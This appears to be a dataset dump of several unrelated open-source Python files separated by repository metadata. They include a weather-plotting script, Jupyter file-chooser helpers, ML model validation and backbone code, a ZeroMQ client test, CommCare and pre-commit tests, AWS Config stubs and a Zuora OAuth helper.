cmap = get_cmap("gray")
cmap.set_bad("white")
res = ax.imshow(
vsby,
aspect="auto",
extent=[0, days * 24, 0, 1],
vmin=0,
cmap=cmap,
vmax=10,
)
cax = fig.add_axes([0.915, 0.08, 0.035, 0.2])
fig.colorbar(res, cax=cax)
fig.text(0.02, 0.09, "Visibility\n[miles]", va="center")
# clouds
ax = fig.add_axes([0.1, 0.16, 0.8, 0.7])
ax.set_facecolor("skyblue")
ax.set_xticks(np.arange(0, int(days * 24) - 1, 24))
ax.set_xticklabels(np.arange(1, days + 1))
fig.text(
0.5,
0.935,
f"{ctx['_sname']}:: {sts:%b %Y} "
"Clouds & Visibility\nbased on ASOS METAR Cloud Amount ",
ha="center",
fontsize=14,
)
cmap = get_cmap("gray_r")
cmap.set_bad("white")
cmap.set_under("skyblue")
ax.imshow(
np.flipud(data),
aspect="auto",
extent=[0, days * 24, 0, 250],
cmap=cmap,
vmin=1,
)
ax.set_yticks(range(0, 260, 50))
ax.set_yticklabels(range(0, 26, 5))
ax.set_ylabel("Cloud Levels [1000s feet]")
fig.text(0.45, 0.02, f"Day of {sts:%b %Y} (UTC Timezone)")
r1 = Rectangle((0, 0), 1, 1, fc="skyblue")
r2 = Rectangle((0, 0), 1, 1, fc="white")
r3 = Rectangle((0, 0), 1, 1, fc="k")
r4 = Rectangle((0, 0), 1, 1, fc="#EEEEEE")
ax.grid(True)
ax.legend(
[r1, r4, r2, r3],
["Clear", "Some", "Unknown", "Obscured by Overcast"],
loc="lower center",
fontsize=14,
bbox_to_anchor=(0.5, 0.99),
fancybox=True,
shadow=True,
ncol=4,
)
return fig
def plot_vsby(days, vsby, ctx, sts):
"""Sky plot variant."""
fig = figure(apctx=ctx)
# need to convert vsby to 2-d
data = np.ones((100, days * 24)) * -3
for i in range(days * 24):
val = vsby[0, i]
if np.ma.is_masked(val):
continue
val = min([int(val * 10), 100])
data[val:, i] = val / 10.0
data[:val, i] = -1
data = np.ma.array(data, mask=np.where(data < -1, True, False))
# clouds
ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
ax.set_facecolor("skyblue")
ax.set_xticks(np.arange(1, days * 24 + 1, 24))
ax.set_xticklabels(np.arange(1, days + 1))
fig.text(
0.5,
0.935,
f"{ctx['_sname']}:: {sts:%b %Y} "
"Visibility\nbased on hourly ASOS METAR Visibility Reports",
ha="center",
fontsize=14,
)
cmap = get_cmap("gray")
cmap.set_bad("white")
cmap.set_under("skyblue")
res = ax.imshow(
np.flipud(data),
aspect="auto",
extent=[0, days * 24, 0, 100],
cmap=cmap,
vmin=0,
vmax=10,
)
cax = fig.add_axes([0.915, 0.08, 0.035, 0.2])
fig.colorbar(res, cax=cax)
ax.set_yticks(range(0, 101, 10))
ax.set_yticklabels(range(0, 11, 1))
ax.set_ylabel("Visibility [miles]")
fig.text(0.45, 0.02, f"Day of {sts:%b %Y} (UTC Timezone)")
ax.grid(True)
return fig
def plotter(fdict):
"""Go"""
ctx = get_autoplot_context(fdict, get_description())
station = ctx["zstation"]
year = ctx["year"]
month = ctx["month"]
ptype = ctx["ptype"]
# Extract the range of forecasts for each day for approximately
# the given month
sts = utc(year, month, 1, 0, 0)
ets = (sts + datetime.timedelta(days=35)).replace(day=1)
days = (ets - sts).days
data = np.ones((250, days * 24)) * -1
vsby = np.ones((1, days * 24)) * -1
with get_sqlalchemy_conn("asos") as conn:
df = pd.read_sql(
"""
SELECT valid at time zone 'UTC' as valid,
skyc1, skyc2, skyc3, skyc4, skyl1, skyl2, skyl3, skyl4, vsby,
extract(epoch from (valid - %s))/3600. as hours
from alldata where station = %s and valid BETWEEN %s and %s
and report_type = 3 ORDER by valid ASC
""",
conn,
params=(sts, station, sts, ets),
index_col=None,
)
lookup = {"CLR": 0, "FEW": 25, "SCT": 50, "BKN": 75, "OVC": 100}
if df.empty:
raise NoDataFound("No database entries found for station, sorry!")
for _, row in df.iterrows():
delta = int(row["hours"] - 1)
data[:, delta] = 0
if not np.isnan(row["vsby"]):
vsby[0, delta] = row["vsby"]
for i in range(1, 5):
a = lookup.get(row[f"skyc{i}"], -1)
if a >= 0:
skyl = row[f"skyl{i}"]
if skyl is not None and skyl > 0:
skyl = int(skyl / 100)
if skyl >= 250:
continue
data[skyl : skyl + 4, delta] = a
data[skyl + 3 :, delta] = min(a, 75)
data = np.ma.array(data, mask=np.where(data < 0, True, False))
vsby = np.ma.array(vsby, mask=np.where(vsby < 0, True, False))
if ptype == "vsby":
fig = plot_vsby(days, vsby, ctx, sts)
else:
fig = plot_sky(days, vsby, data, ctx, sts)
return fig, df
if __name__ == "__main__":
plotter({})
|
411984ae30eb4d3fcd9c0830069768cce1648e1e
|
be540a0f683235a6be13ca9f6150509ade957887
|
/motrackers/utils/filechooser_utils.py
|
eef639de12939d5d368c08598d458a5e527e0311
|
[
"MIT"
] |
permissive
|
adipandas/multi-object-tracker
|
9890873c111fb70c86de0efd7476124f9f722184
|
5d5474f4d95cb5aa4be21a4d14f4333a392579d5
|
refs/heads/master
| 2023-08-31T13:33:33.278920
| 2023-06-01T15:25:07
| 2023-06-01T15:25:07
| 148,338,463
| 672
| 97
|
MIT
| 2023-08-10T08:33:12
| 2018-09-11T15:25:03
|
Python
|
UTF-8
|
Python
| false
| false
| 3,619
|
py
|
filechooser_utils.py
|
from ipyfilechooser import FileChooser
def create_filechooser(default_path="~/", html_title="Select File", use_dir_icons=True):
fc = FileChooser(default_path)
fc.title = html_title
fc.use_dir_icons = use_dir_icons
return fc
def select_caffemodel_prototxt(default_path="~/", use_dir_icons=True):
html_title = '<b>Select <code>.prototxt</code> file for the caffemodel:</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_caffemodel_weights(default_path="~/", use_dir_icons=True):
html_title = '<b>Select caffemodel weights (file with extention <code>.caffemodel</code>):</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_caffemodel(default_path="~/", use_dir_icons=True):
prototxt = select_caffemodel_prototxt(default_path=default_path, use_dir_icons=use_dir_icons)
weights = select_caffemodel_weights(default_path=default_path, use_dir_icons=use_dir_icons)
return prototxt, weights
def select_videofile(default_path="~/", use_dir_icons=True):
html_title = '<b>Select video file:</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_yolo_weights(default_path="~/", use_dir_icons=True):
html_title = '<b>Select YOLO weights (<code>.weights</code> file):</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_coco_labels(default_path="~/", use_dir_icons=True):
html_title = '<b>Select coco labels file (<code>.name</code> file):</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_yolo_config(default_path="~/", use_dir_icons=True):
html_title = '<b>Choose YOLO config file (<code>.cfg</code> file):</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_yolo_model(default_path="~/", use_dir_icons=True):
yolo_weights = select_yolo_weights(default_path, use_dir_icons)
yolo_config = select_yolo_config(default_path, use_dir_icons)
coco_names = select_coco_labels(default_path, use_dir_icons)
return yolo_weights, yolo_config, coco_names
def select_pbtxt(default_path="~/", use_dir_icons=True):
html_title = '<b>Select <code>.pbtxt</code> file:</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_tfmobilenet_weights(default_path="~/", use_dir_icons=True):
html_title = '<b>Select tf-frozen graph of mobilenet (<code>.pb</code> file):</b>'
fc = create_filechooser(default_path=default_path,
html_title=html_title,
use_dir_icons=use_dir_icons)
return fc
def select_tfmobilenet(default_path="~/", use_dir_icons=True):
prototxt = select_pbtxt(default_path, use_dir_icons)
tfweights = select_tfmobilenet_weights(default_path, use_dir_icons)
return prototxt, tfweights
|
1b37d277619863e9b7354d33a9f00f5b6cfb9fcb
|
753cd066a9bd26b6c37c8d53a86c7a9c659ec18c
|
/vision/vit/pytorch/validation.py
|
716c9cba2dfedd9ba6ae17c07fac616067232883
|
[
"MIT",
"CC-BY-NC-4.0",
"BSD-3-Clause",
"Apache-2.0",
"HPND"
] |
permissive
|
graphcore/examples
|
ac872015808ed2a913d4d7bf0d63202ce15ebbae
|
e2f834dd60e7939672c1795b4ac62e89ad0bca49
|
refs/heads/master
| 2023-08-05T02:08:12.341836
| 2023-07-27T11:13:10
| 2023-07-27T11:13:10
| 143,977,106
| 311
| 80
|
MIT
| 2023-09-11T16:42:56
| 2018-08-08T07:29:17
|
Python
|
UTF-8
|
Python
| false
| false
| 3,960
|
py
|
validation.py
|
# Copyright (c) 2021 Graphcore Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file has been modified by Graphcore
import numpy as np
import poptorch
import torch
import transformers
import wandb
from args import parse_args
from dataset import get_data
from ipu_options import get_options
from log import logger
from metrics import accuracy
from models import PipelinedViTForImageClassification, PipelinedViTForImageClassificationPretraining
from checkpoint import restore_checkpoint
if __name__ == "__main__":
# Validation loop
# Build config from args
config = transformers.ViTConfig(**vars(parse_args()))
logger.info(f"Running config: {config.config}")
# W&B
if config.wandb:
wandb.init(
project=config.wandb_project_name, name=config.wandb_run_name, settings=wandb.Settings(console="wrap")
)
wandb.config.update(vars(config))
# Execution parameters
opts = get_options(config)
test_loader = get_data(config, opts, train=False, async_dataloader=True)
# Init from a checkpoint
if config.pretrain:
model = PipelinedViTForImageClassificationPretraining(config).eval()
model_state_dict = restore_checkpoint(config, val=True)
model.load_state_dict(model_state_dict)
else:
model = (
PipelinedViTForImageClassification.from_pretrained(config.pretrained_checkpoint, config=config)
.parallelize()
.train()
)
if config.precision.startswith("16."):
model.half()
valid_opts = poptorch.Options()
valid_opts.deviceIterations(config.device_iterations)
valid_opts.outputMode(poptorch.OutputMode.All)
valid_opts.Precision.enableStochasticRounding(False)
# Wrap in the PopTorch inference wrapper
inference_model = poptorch.inferenceModel(model, options=valid_opts)
all_preds, all_labels, all_losses = [], [], []
for step, (input_data, labels) in enumerate(test_loader):
# if pretrain = True, second output is acc, otherwise its logits
losses, out = inference_model(input_data, labels)
all_labels.append(labels.detach().clone())
if not config.pretrain:
preds = torch.argmax(out, dim=-1)
acc = accuracy(preds, labels)
all_preds.append(preds.detach().clone())
else:
# out contains (config.samples_per_step / config.micro_batch_size) accuracies
# accuracy value is per micro batch, so undo the division to get accuracy
# per engine run
acc = (out * config.micro_batch_size).sum() / config.samples_per_step
all_preds.append(out * config.micro_batch_size)
logger.info("Valid Loss: {:.3f} Acc: {:.3f}".format(torch.mean(losses).item(), acc))
if config.wandb:
wandb.log({"Loss": torch.mean(losses).item(), "Accuracy": acc})
all_labels = torch.cat(all_labels)
all_preds = torch.cat(all_preds)
num_samples = all_labels.shape[0]
if not config.pretrain:
val_accuracy = accuracy(all_preds, all_labels)
else:
val_accuracy = (all_preds.sum() / num_samples).item()
logger.info("\n")
logger.info("Validation Results")
logger.info("Valid Accuracy: %2.5f" % val_accuracy)
logger.info("Number of samples: %d" % num_samples)
if config.wandb:
wandb.log({"Total Accuracy": val_accuracy, "Number of samples": num_samples})
|
a05440db0ce3c1820bc54d69ff3025defff54ce8
|
e459a9608225b81bdb0a5b85cd19b7bd0f6df38e
|
/test_frame/other_tests/test_zeromq/test_zeromq_client.py
|
20f53c285e286113fbf698172298cf0976563973
|
[
"Apache-2.0"
] |
permissive
|
ydf0509/distributed_framework
|
722be4957df97bfece9ca5b43d81b4e3bb09ed8e
|
1b1f32ed928fa44e0fb13fc738de90cb4339f408
|
refs/heads/master
| 2022-05-20T10:19:05.727086
| 2022-03-31T11:16:22
| 2022-03-31T11:16:22
| 201,225,545
| 359
| 90
|
Apache-2.0
| 2021-05-08T16:50:53
| 2019-08-08T09:30:13
|
Python
|
UTF-8
|
Python
| false
| false
| 378
|
py
|
test_zeromq_client.py
|
import zmq,time
# Prepare our context and sockets
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://localhost:5559")
# Do 10 requests, waiting each time for a response
for request in range(1,11):
time.sleep(2)
socket.send(f"Hello {request}".encode())
message = socket.recv()
print("Received reply %s [%s]" % (request, message))
|
b3da72a1f84544b2e29f1f9c3412156c074c17a5
|
578db86c51d44ebddd0dc7b1738985b3dc69eb74
|
/corehq/apps/hqcase/tests/test_case_sharing.py
|
ef4793be30e7e472fec5b6b2bbaa408316eb7a32
|
[
"BSD-3-Clause"
] |
permissive
|
dimagi/commcare-hq
|
a43c7dd32b5f89c89fd5aa1b1359ab7301f4ff6b
|
e7391ddae1af1dbf118211ecb52c83fc508aa656
|
refs/heads/master
| 2023-08-16T22:38:27.853437
| 2023-08-16T19:07:19
| 2023-08-16T19:07:19
| 247,278
| 499
| 203
|
BSD-3-Clause
| 2023-09-14T19:03:24
| 2009-07-09T17:00:07
|
Python
|
UTF-8
|
Python
| false
| false
| 4,811
|
py
|
test_case_sharing.py
|
from django.test import TestCase
from casexml.apps.case.mock import CaseBlock
from casexml.apps.case.tests.util import deprecated_check_user_has_case
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.groups.models import Group
from corehq.apps.hqcase.utils import submit_case_blocks
from corehq.apps.users.models import CommCareUser
from corehq.apps.users.util import format_username
class CaseSharingTest(TestCase):
def setUp(self):
"""
Two groups A and B, with users A1, A2 and B1, B2 respectively, and supervisor X who belongs to both.
"""
self.domain = "test-domain"
self.domain_obj = create_domain(self.domain)
password = "****"
def create_user(username):
return CommCareUser.create(self.domain, format_username(username, self.domain), password, None, None)
def create_group(name, *users):
group = Group(users=[user.user_id for user in users], name=name, domain=self.domain,
case_sharing=True)
group.save()
return group
self.userX = create_user("X")
self.userA1 = create_user("A1")
self.userA2 = create_user("A2")
self.userB1 = create_user("B1")
self.userB2 = create_user("B2")
self.groupA = create_group("A", self.userX, self.userA1, self.userA2)
self.groupB = create_group("B", self.userX, self.userB1, self.userB2)
def tearDown(self):
self.domain_obj.delete()
def test_sharing(self):
def create_and_test(case_id, user, owner, should_have, should_not_have):
case_block = self.get_create_block(
case_id=case_id,
type="case",
user_id=user.user_id,
owner_id=owner.get_id,
)
submit_case_blocks(case_block, domain=self.domain)
check_has_block(case_block, should_have, should_not_have)
def update_and_test(case_id, owner=None, should_have=None, should_not_have=None):
case_block = self.get_update_block(
case_id=case_id,
update={'greeting': "Hello!"},
owner_id=owner.get_id if owner else None,
)
submit_case_blocks(case_block, domain=self.domain)
check_has_block(case_block, should_have, should_not_have, line_by_line=False)
def check_has_block(case_block, should_have, should_not_have, line_by_line=True):
for user in should_have:
deprecated_check_user_has_case(self, user.to_ota_restore_user(user.domain),
case_block, line_by_line=line_by_line)
for user in should_not_have:
deprecated_check_user_has_case(self, user.to_ota_restore_user(user.domain),
case_block, should_have=False, line_by_line=line_by_line)
create_and_test(
case_id='case-a-1',
user=self.userA1,
owner=self.groupA,
should_have=[self.userA1, self.userA2, self.userX],
should_not_have=[self.userB1, self.userB2],
)
create_and_test(
case_id='case-b-1',
user=self.userB1,
owner=self.groupB,
should_have=[self.userB1, self.userB2, self.userX],
should_not_have=[self.userA1, self.userA2],
)
create_and_test(
case_id='case-a-2',
user=self.userX,
owner=self.groupA,
should_have=[self.userA1, self.userA2, self.userX],
should_not_have=[self.userB1, self.userB2],
)
update_and_test(
case_id='case-a-1',
should_have=[self.userA1, self.userA2, self.userX],
should_not_have=[self.userB1, self.userB2],
)
update_and_test(
case_id='case-a-1',
owner=self.groupB,
should_have=[self.userB1, self.userB2, self.userX],
should_not_have=[self.userA1, self.userA2],
)
def get_create_block(self, case_id, type, user_id, owner_id, name=None, **kwargs):
name = name or case_id
case_block = CaseBlock.deprecated_init(
create=True,
case_id=case_id,
case_name=name,
case_type=type,
user_id=user_id,
external_id=case_id,
owner_id=owner_id,
**kwargs
).as_text()
return case_block
def get_update_block(self, case_id, owner_id=None, update=None):
update = update or {}
kwargs = {'owner_id': owner_id} if owner_id else {}
case_block = CaseBlock.deprecated_init(
case_id=case_id,
update=update,
**kwargs,
).as_text()
return case_block
|
0deda2313a015dc3a0b887940d65b9b4cf6738c7
|
9241974e50a37303163303660f66f6b77cc5632a
|
/tests/commands/validate_manifest_test.py
|
a4bc8ac05215e472389c0f3a074e4f993bcf3589
|
[
"MIT"
] |
permissive
|
pre-commit/pre-commit
|
c138e1bd540c7515c10f0d61f3d7a4ef66d5bf0a
|
a1f1d1915646865be2fe84d04633ba964feb0ba0
|
refs/heads/main
| 2023-08-19T08:07:21.342724
| 2023-08-15T14:19:29
| 2023-08-15T14:19:29
| 17,689,377
| 10,804
| 912
|
MIT
| 2023-09-12T00:06:21
| 2014-03-13T00:39:38
|
Python
|
UTF-8
|
Python
| false
| false
| 519
|
py
|
validate_manifest_test.py
|
from __future__ import annotations
from pre_commit.commands.validate_manifest import validate_manifest
def test_validate_manifest_ok():
assert not validate_manifest(('.pre-commit-hooks.yaml',))
def test_not_ok(tmpdir):
not_yaml = tmpdir.join('f.notyaml')
not_yaml.write('{')
not_schema = tmpdir.join('notconfig.yaml')
not_schema.write('{}')
assert validate_manifest(('does-not-exist',))
assert validate_manifest((not_yaml.strpath,))
assert validate_manifest((not_schema.strpath,))
|
58c3fb2300c91f42bc8970674832e20b53471813
|
c46754b9600a12df4f9d7a6320dfc19aa96b1e1d
|
/src/transformers/models/timm_backbone/modeling_timm_backbone.py
|
dc117f743642d8e518a8cb4a7139b22b6cfb2115
|
[
"Apache-2.0"
] |
permissive
|
huggingface/transformers
|
ccd52a0d7c59e5f13205f32fd96f55743ebc8814
|
4fa0aff21ee083d0197a898cdf17ff476fae2ac3
|
refs/heads/main
| 2023-09-05T19:47:38.981127
| 2023-09-05T19:21:33
| 2023-09-05T19:21:33
| 155,220,641
| 102,193
| 22,284
|
Apache-2.0
| 2023-09-14T20:44:49
| 2018-10-29T13:56:00
|
Python
|
UTF-8
|
Python
| false
| false
| 6,129
|
py
|
modeling_timm_backbone.py
|
# coding=utf-8
# Copyright 2023 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Optional, Tuple, Union
import torch
from ...modeling_outputs import BackboneOutput
from ...modeling_utils import PreTrainedModel
from ...utils import is_timm_available, is_torch_available, requires_backends
from ...utils.backbone_utils import BackboneMixin
from .configuration_timm_backbone import TimmBackboneConfig
if is_timm_available():
import timm
if is_torch_available():
from torch import Tensor
class TimmBackbone(PreTrainedModel, BackboneMixin):
"""
Wrapper class for timm models to be used as backbones. This enables using the timm models interchangeably with the
other models in the library keeping the same API.
"""
main_input_name = "pixel_values"
supports_gradient_checkpointing = False
config_class = TimmBackboneConfig
def __init__(self, config, **kwargs):
requires_backends(self, "timm")
super().__init__(config)
self.config = config
if config.backbone is None:
raise ValueError("backbone is not set in the config. Please set it to a timm model name.")
if config.backbone not in timm.list_models():
raise ValueError(f"backbone {config.backbone} is not supported by timm.")
if hasattr(config, "out_features") and config.out_features is not None:
raise ValueError("out_features is not supported by TimmBackbone. Please use out_indices instead.")
pretrained = getattr(config, "use_pretrained_backbone", None)
if pretrained is None:
raise ValueError("use_pretrained_backbone is not set in the config. Please set it to True or False.")
# We just take the final layer by default. This matches the default for the transformers models.
out_indices = config.out_indices if getattr(config, "out_indices", None) is not None else (-1,)
self._backbone = timm.create_model(
config.backbone,
pretrained=pretrained,
# This is currently not possible for transformer architectures.
features_only=config.features_only,
in_chans=config.num_channels,
out_indices=out_indices,
**kwargs,
)
# These are used to control the output of the model when called. If output_hidden_states is True, then
# return_layers is modified to include all layers.
self._return_layers = self._backbone.return_layers
self._all_layers = {layer["module"]: str(i) for i, layer in enumerate(self._backbone.feature_info.info)}
super()._init_backbone(config)
@classmethod
def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
requires_backends(cls, ["vision", "timm"])
from ...models.timm_backbone import TimmBackboneConfig
config = kwargs.pop("config", TimmBackboneConfig())
use_timm = kwargs.pop("use_timm_backbone", True)
if not use_timm:
raise ValueError("use_timm_backbone must be True for timm backbones")
num_channels = kwargs.pop("num_channels", config.num_channels)
features_only = kwargs.pop("features_only", config.features_only)
use_pretrained_backbone = kwargs.pop("use_pretrained_backbone", config.use_pretrained_backbone)
out_indices = kwargs.pop("out_indices", config.out_indices)
config = TimmBackboneConfig(
backbone=pretrained_model_name_or_path,
num_channels=num_channels,
features_only=features_only,
use_pretrained_backbone=use_pretrained_backbone,
out_indices=out_indices,
)
return super()._from_config(config, **kwargs)
def _init_weights(self, module):
"""
Empty init weights function to ensure compatibility of the class in the library.
"""
pass
def forward(
self,
pixel_values: torch.FloatTensor,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
**kwargs,
) -> Union[BackboneOutput, Tuple[Tensor, ...]]:
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
if output_attentions:
raise ValueError("Cannot output attentions for timm backbones at the moment")
if output_hidden_states:
# We modify the return layers to include all the stages of the backbone
self._backbone.return_layers = self._all_layers
hidden_states = self._backbone(pixel_values, **kwargs)
self._backbone.return_layers = self._return_layers
feature_maps = tuple(hidden_states[i] for i in self.out_indices)
else:
feature_maps = self._backbone(pixel_values, **kwargs)
hidden_states = None
feature_maps = tuple(feature_maps)
hidden_states = tuple(hidden_states) if hidden_states is not None else None
if not return_dict:
output = (feature_maps,)
if output_hidden_states:
output = output + (hidden_states,)
return output
return BackboneOutput(feature_maps=feature_maps, hidden_states=hidden_states, attentions=None)
|
eb9b04f5170762132bcdfcb7d03113f23cbdd806
|
d51f530078404a24f1844b53b037bbfed238a784
|
/python/test_tools/config_stubber.py
|
80e9b4c0a2617dad7d42f576a573dc3a9a0d4e34
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
awsdocs/aws-doc-sdk-examples
|
fff85d1b4119fe3331174396a5723c7f054203eb
|
dec41fb589043ac9d8667aac36fb88a53c3abe50
|
refs/heads/main
| 2023-09-03T19:50:57.809260
| 2023-09-01T16:23:01
| 2023-09-01T16:23:01
| 66,023,605
| 8,240
| 6,037
|
Apache-2.0
| 2023-09-14T16:52:02
| 2016-08-18T19:06:57
|
Java
|
UTF-8
|
Python
| false
| false
| 2,994
|
py
|
config_stubber.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
"""
Stub functions that are used by the AWS Config unit tests.
"""
from test_tools.example_stubber import ExampleStubber
class ConfigStubber(ExampleStubber):
"""
A class that implements stub functions used by AWS Config unit tests.
The stubbed functions expect certain parameters to be passed to them as
part of the tests, and raise errors if the parameters are not as expected.
"""
def __init__(self, client, use_stubs=True):
"""
Initializes the object with a specific client and configures it for
stubbing or AWS passthrough.
:param client: A Boto3 AWS Config client.
:param use_stubs: When True, use stubs to intercept requests. Otherwise,
pass requests through to AWS.
"""
super().__init__(client, use_stubs)
def stub_put_config_rule(self, rule, error_code=None):
expected_params = {'ConfigRule': rule}
response = {}
self._stub_bifurcator(
'put_config_rule', expected_params, response, error_code=error_code)
def stub_describe_config_rules(self, rule_names, source_ids=None, error_code=None):
expected_params = {'ConfigRuleNames': rule_names}
response = {'ConfigRules': [{
'ConfigRuleName': name,
'Source': {'Owner': 'Test', 'SourceIdentifier': 'TestID'}}
for name in rule_names]}
if source_ids is not None:
for rule, source_id in zip(response['ConfigRules'], source_ids):
rule['Source']['SourceIdentifier'] = source_id
self._stub_bifurcator(
'describe_config_rules', expected_params, response, error_code=error_code)
def stub_delete_config_rule(self, rule_name, error_code=None):
expected_params = {'ConfigRuleName': rule_name}
response = {}
self._stub_bifurcator(
'delete_config_rule', expected_params, response, error_code=error_code)
def stub_describe_conformance_packs(self, packs, error_code=None):
expected_params = {}
response = {'ConformancePackDetails': [{
'ConformancePackName': pack,
'ConformancePackArn': f'arn:{pack}',
'ConformancePackId': f'{pack}-id'
} for pack in packs]}
self._stub_bifurcator(
'describe_conformance_packs', expected_params, response, error_code=error_code)
def stub_describe_conformance_pack_compliance(self, pack_name, rule_names, error_code=None):
expected_params = {'ConformancePackName': pack_name}
response = {
'ConformancePackName': pack_name,
'ConformancePackRuleComplianceList': [{
'ConfigRuleName': rule_name
} for rule_name in rule_names]}
self._stub_bifurcator(
'describe_conformance_pack_compliance', expected_params, response, error_code=error_code)
|
ef9a349d85c309788fa5f516989f6337b1acab23
|
fa1ad2e2ac7e376fc7cb3b3a6e1bb88eed3e80be
|
/dts/airbyte/airbyte-integrations/connectors/source-zuora/source_zuora/zuora_auth.py
|
c5adcd9666c2b3b4a0c145014d3af9e78d83dbd0
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"Elastic-2.0"
] |
permissive
|
alldatacenter/alldata
|
7bc7713c9f1d56ad6b8e59ea03206d1073b7e047
|
8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6
|
refs/heads/master
| 2023-08-05T07:32:25.442740
| 2023-08-03T13:17:24
| 2023-08-03T13:17:24
| 213,321,771
| 774
| 250
|
Apache-2.0
| 2023-09-06T17:35:32
| 2019-10-07T07:36:18
| null |
UTF-8
|
Python
| false
| false
| 1,131
|
py
|
zuora_auth.py
|
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from typing import Any, Dict, Mapping
from airbyte_cdk.sources.streams.http.requests_native_auth.oauth import Oauth2Authenticator
from .zuora_endpoint import get_url_base
class OAuth(Oauth2Authenticator):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def get_refresh_request_body(self) -> Mapping[str, Any]:
payload = super().get_refresh_request_body()
payload["grant_type"] = "client_credentials"
payload.pop("refresh_token") # Zuora doesn't have Refresh Token parameter
return payload
class ZuoraAuthenticator:
def __init__(self, config: Dict):
self.config = config
@property
def url_base(self) -> str:
return get_url_base(self.config["tenant_endpoint"])
def get_auth(self) -> OAuth:
return OAuth(
token_refresh_endpoint=f"{self.url_base}/oauth/token",
client_id=self.config["client_id"],
client_secret=self.config["client_secret"],
refresh_token=None, # Zuora doesn't have Refresh Token parameter
)
|
d869925851c1fb7d9f973e43eeca3fda04d913c3
|
1382132f3687305173f3bb61391cf2002e6d7ce6
|
/rl_algorithms/gail/networks.py
|
c8f66bf70c7ea49fb663526c4816fd8dda7dc056
|
[
"MIT"
] |
permissive
|
medipixel/rl_algorithms
|
37caff91f78c51e70f06d0c2ad590fabe2a7ebd6
|
fdfac4e7056ee5a9d5b48b7b9653ce844a03ca22
|
refs/heads/master
| 2023-08-06T09:11:48.128961
| 2022-09-15T06:21:54
| 2022-09-15T06:21:54
| 161,100,560
| 525
| 94
|
MIT
| 2023-04-08T09:15:39
| 2018-12-10T01:40:01
|
Python
|
UTF-8
|
Python
| false
| false
| 2,611
|
py
|
networks.py
|
# -*- coding: utf-8 -*-
from typing import Tuple, Union
import torch
import torch.nn as nn
from rl_algorithms.common.helper_functions import identity
from rl_algorithms.registry import build_backbone, build_head
from rl_algorithms.utils.config import ConfigDict
# TODO: Remove it when upgrade torch>=1.7
# pylint: disable=abstract-method
class Discriminator(nn.Module):
"""Discriminator to classify experience data and expert data"""
def __init__(
self,
backbone_cfg: ConfigDict,
head_cfg: ConfigDict,
action_embedder_cfg: ConfigDict,
shared_backbone: nn.Module = None,
):
nn.Module.__init__(self)
if shared_backbone is not None:
self.backbone = shared_backbone
head_cfg.configs.input_size = self.calculate_fc_input_size(
head_cfg.configs.state_size
)
elif not backbone_cfg:
self.backbone = identity
head_cfg.configs.input_size = head_cfg.configs.state_size[0]
else:
self.backbone = build_backbone(backbone_cfg)
head_cfg.configs.input_size = self.calculate_fc_input_size(
head_cfg.configs.state_size
)
self.action_embedder = None
if action_embedder_cfg:
action_embedder_cfg.configs.input_size = head_cfg.configs.action_size
self.action_embedder = build_head(action_embedder_cfg)
head_cfg.configs.input_size += action_embedder_cfg.configs.output_size
else:
head_cfg.configs.input_size += head_cfg.configs.action_size
self.head = build_head(head_cfg)
def forward(
self, state_action: Tuple[torch.Tensor, torch.Tensor]
) -> Union[torch.Tensor, Tuple[torch.Tensor, ...]]:
"""Forward method implementation. Use in get_action method in agent."""
state_feature = self.backbone(state_action[0])
action_feature = state_action[1]
if self.action_embedder:
action_feature = self.forward_action_embedder(action_feature)
return self.head(torch.cat([state_feature, action_feature], dim=-1))
def forward_action_embedder(
self, x: torch.Tensor
) -> Union[torch.Tensor, Tuple[torch.Tensor, ...]]:
"""Forward method of action embedder."""
return self.action_embedder(x)
def calculate_fc_input_size(self, state_dim: tuple):
"""Calculate fc input size according to the shape of cnn."""
x = torch.zeros(state_dim).unsqueeze(0)
output = self.backbone(x).detach().view(-1)
return output.shape[0]
|
75516c87834b409fbc43f7bdfef1475700bcad6d
|
0ca218c0f54dac33a2ade4accfdf8f5be3207588
|
/lib/sqlalchemy/engine/cursor.py
|
246cf6fe78009537ed35048aa0ae346525abdb93
|
[
"MIT"
] |
permissive
|
